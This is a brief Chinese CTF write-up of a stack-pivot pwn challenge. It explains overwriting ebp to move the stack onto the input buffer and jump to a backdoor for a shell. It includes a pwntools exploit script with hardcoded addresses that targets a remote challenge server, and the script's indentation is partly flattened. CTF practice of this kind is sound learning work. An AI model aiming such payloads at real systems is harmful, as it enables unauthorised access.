日常水题的一天这个和pwnable.kr 上的一道题很像也是一道栈迁移的题目 我们直接看main函数 把输入的base64解密长度不能超过12 目的是correct函数 发现这里可以覆盖ebp我们就可以将栈迁移到input处然后mov esp,ebp ; pop ebp; pop eip;main函数公用ebp控制eip为我们的后门地址直接拿到shell(打pwn不要限制于拿到shell哦) exp:
from pwn import *
import base64
#p=process('./fmt')
p=remote('111.198.29.45',49541)
elf=ELF('./fmt')
def debug():
gdb.attach(p)
pause()
system_addr=0x08049284
input_addr=0x0811EB40
payload='a'*4+p32(system_addr)+p32(input_addr)
#debug()
p.sendline(base64.b64encode(payload))
p.interactive()
我虽然pwn不厉害 但是我基础的还是会一点的